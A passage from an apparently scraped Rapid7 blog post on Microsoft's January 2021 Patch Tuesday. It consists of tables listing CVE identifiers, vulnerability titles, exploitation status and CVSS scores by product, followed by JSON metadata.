\n[CVE-2021-1725](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1725>) | Bot Framework SDK Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-1723](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1723>) | ASP.NET Core and Visual Studio Denial of Service Vulnerability | No | No | 7.5 | No \n \n## Developer Tools Windows Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1651](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1651>) | Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1680](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1680>) | Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability | No | No | 7.8 | No \n \n## Microsoft Office Vulnerabilities\n\nCVE | title | Exploited | Disclosed | CVSS3 | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1715](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1715>) | Microsoft Word Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-1716](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1716>) | Microsoft Word Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-1641](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1641>) | Microsoft SharePoint Spoofing Vulnerability | No | No | 4.6 | No \n[CVE-2021-1717](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1717>) | Microsoft SharePoint Spoofing Vulnerability | No | No | 4.6 | No \n[CVE-2021-1718](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1718>) | Microsoft SharePoint Server Tampering Vulnerability | No | No | 8 | No \n[CVE-2021-1707](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1707>) | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-1712](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1712>) | Microsoft SharePoint Elevation of Privilege Vulnerability | No | No | 8 | No \n[CVE-2021-1719](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1719>) | Microsoft SharePoint Elevation of Privilege Vulnerability | No | No | 8 | No \n[CVE-2021-1711](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1711>) | Microsoft Office Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-1713](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1713>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-1714](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1714>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n \n## SQL Server Vulnerabilities\n\nCVE | title | Exploited | Disclosed | CVSS3 | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1636](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1636>) | Microsoft SQL Elevation of Privilege Vulnerability | No | No | 8.8 | Yes \n \n## System Center Vulnerabilities\n\nCVE | title | Exploited | Disclosed | CVSS3 | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1647](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1647>) | Microsoft Defender Remote Code Execution Vulnerability | Yes | No | 7.8 | Yes \n \n## Windows Vulnerabilities\n\nCVE | title | Exploited | Disclosed | CVSS3 | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1681](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1681>) | Windows WalletService Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1686](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1686>) | Windows WalletService Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1687](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1687>) | Windows WalletService Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1690](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1690>) | Windows WalletService Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1646](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1646>) | Windows WLAN Service Elevation of Privilege Vulnerability | No | No | 6.6 | No \n[CVE-2021-1650](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1650>) | Windows Runtime C++ Template Library Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1663](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1663>) | Windows Projected File System FS Filter Driver Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-1670](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1670>) | Windows Projected File System FS Filter Driver Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-1672](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1672>) | Windows Projected File System FS Filter Driver Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-1689](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1689>) | Windows Multipoint Management Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1682](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1682>) | Windows Kernel Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-1697](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1697>) | Windows InstallService Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1662](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1662>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1703](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1703>) | Windows Event Logging Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1645](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1645>) | Windows Docker Information Disclosure Vulnerability | No | No | 5 | Yes \n[CVE-2021-1637](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1637>) | Windows DNS Query Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-1638](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1638>) | Windows Bluetooth Security Feature Bypass Vulnerability | No | No | 7.7 | No \n[CVE-2021-1683](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1683>) | Windows Bluetooth Security Feature Bypass Vulnerability | No | No | 5 | No \n[CVE-2021-1684](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1684>) | Windows Bluetooth Security Feature Bypass Vulnerability | No | No | 5 | No \n[CVE-2021-1642](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1642>) | Windows AppX Deployment Extensions Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1685](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1685>) | Windows AppX Deployment Extensions Elevation of Privilege Vulnerability | No | No | 7.3 | No \n[CVE-2021-1648](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1648>) | Microsoft splwow64 Elevation of Privilege Vulnerability | No | Yes | 7.8 | Yes \n[CVE-2021-1710](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1710>) | Microsoft Windows Media Foundation Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-1691](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1691>) | Hyper-V Denial of Service Vulnerability | No | No | 7.7 | No \n[CVE-2021-1692](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1692>) | Hyper-V Denial of Service Vulnerability | No | No | 7.7 | No \n[CVE-2021-1643](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1643>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-1644](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1644>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n \n## Windows Apps Vulnerabilities\n\nCVE | title | Exploited | Disclosed | CVSS3 | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1669](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1669>) | Windows Remote Desktop Security Feature Bypass Vulnerability | No | No | 8.8 | Yes \n \n## Windows ESU Vulnerabilities\n\nCVE | title | Exploited | Disclosed | CVSS3 | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1709](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1709>) | Windows Win32k Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-1694](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1694>) | Windows Update Stack Elevation of Privilege Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-1702](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1702>) | Windows Remote Procedure Call Runtime Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1674](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1674>) | Windows Remote Desktop Protocol Core Security Feature Bypass Vulnerability | No | No | 8.8 | No \n[CVE-2021-1695](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1695>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1676](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1676>) | Windows NT Lan Manager Datagram Receiver Driver Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-1706](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1706>) | Windows LUAFV Elevation of Privilege Vulnerability | No | No | 7.3 | No \n[CVE-2021-1661](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1661>) | Windows Installer Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1704](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1704>) | Windows Hyper-V Elevation of Privilege Vulnerability | No | No | 7.3 | No \n[CVE-2021-1696](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1696>) | Windows Graphics Component Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-1708](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1708>) | Windows GDI+ Information Disclosure Vulnerability | No | No | 5.7 | Yes \n[CVE-2021-1657](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1657>) | Windows Fax Compose Form Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-1679](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1679>) | Windows CryptoAPI Denial of Service Vulnerability | No | No | 6.5 | No \n[CVE-2021-1652](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1652>) | Windows CSC Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1653](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1653>) | Windows CSC Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1654](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1654>) | Windows CSC Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1655](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1655>) | Windows CSC Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1659](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1659>) | Windows CSC Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1688>) | Windows CSC Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1693](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1693>) | Windows CSC Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1699](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1699>) | Windows (modem.sys) Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-1656](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1656>) | TPM Device Driver Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-1658](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1658>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-1660](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1660>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-1666](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1666>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-1667](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1667>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-1673](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1673>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-1664](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1664>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-1671](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1671>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-1700](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1700>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-1701](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1701>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-1678](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1678>) | NTLM Security Feature Bypass Vulnerability | No | No | 4.3 | No \n[CVE-2021-1668](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1668>) | Microsoft DTV-DVD Video Decoder Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-1665](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1665>) | GDI+ Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-1649](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1649>) | Active Template Library Elevation of Privilege Vulnerability | No | No | 7.8 | No \n \n## Summary Graphs\n\n![Patch Tuesday - January 2021](https://blog.rapid7.com/content/images/2021/01/output_18_2.png)![Patch Tuesday - January 2021](https://blog.rapid7.com/content/images/2021/01/output_25_1.png)![Patch Tuesday - January 2021](https://blog.rapid7.com/content/images/2021/01/output_26_1.png)![Patch Tuesday - January 2021](https://blog.rapid7.com/content/images/2021/01/output_20_2.png)\n\n________Note: Graph data is reflective of data presented by Microsoft's CVRF at the time of writing.________", "cvss3": {}, "published": "2021-01-12T23:59:00", "type": "rapid7blog", "title": "Patch Tuesday - January 2021", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-26870", "CVE-2021-1636", "CVE-2021-1637", "CVE-2021-1638", "CVE-2021-1641", "CVE-2021-1642", "CVE-2021-1643", "CVE-2021-1644", "CVE-2021-1645", "CVE-2021-1646", "CVE-2021-1647", "CVE-2021-1648", "CVE-2021-1649", "CVE-2021-1650", "CVE-2021-1651", "CVE-2021-1652", "CVE-2021-1653", "CVE-2021-1654", "CVE-2021-1655", "CVE-2021-1656", "CVE-2021-1657", "CVE-2021-1658", "CVE-2021-1659", "CVE-2021-1660", "CVE-2021-1661", "CVE-2021-1662", "CVE-2021-1663", "CVE-2021-1664", "CVE-2021-1665", "CVE-2021-1666", "CVE-2021-1667", "CVE-2021-1668", "CVE-2021-1669", "CVE-2021-1670", "CVE-2021-1671", "CVE-2021-1672", "CVE-2021-1673", "CVE-2021-1674", "CVE-2021-1676", "CVE-2021-1677", "CVE-2021-1678", "CVE-2021-1679", "CVE-2021-1680", "CVE-2021-1681", "CVE-2021-1682", "CVE-2021-1683", "CVE-2021-1684", "CVE-2021-1685", "CVE-2021-1686", "CVE-2021-1687", "CVE-2021-1688", "CVE-2021-1689", "CVE-2021-1690", "CVE-2021-1691", "CVE-2021-1692", "CVE-2021-1693", "CVE-2021-1694", "CVE-2021-1695", "CVE-2021-1696", "CVE-2021-1697", "CVE-2021-1699", "CVE-2021-1700", "CVE-2021-1701", "CVE-2021-1702", "CVE-2021-1703", "CVE-2021-1704", "CVE-2021-1705", "CVE-2021-1706", "CVE-2021-1707", "CVE-2021-1708", "CVE-2021-1709", "CVE-2021-1710", "CVE-2021-1711", "CVE-2021-1712", "CVE-2021-1713", "CVE-2021-1714", "CVE-2021-1715", "CVE-2021-1716", "CVE-2021-1717", "CVE-2021-1718", "CVE-2021-1719", "CVE-2021-1723", "CVE-2021-1725"], "modified": "2021-01-12T23:59:00", "id": "RAPID7BLOG:A8AF62CC15B38126207722D29F080EE3", "href": "https://blog.rapid7.com/2021/01/12/patch-tuesday-january-2021/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}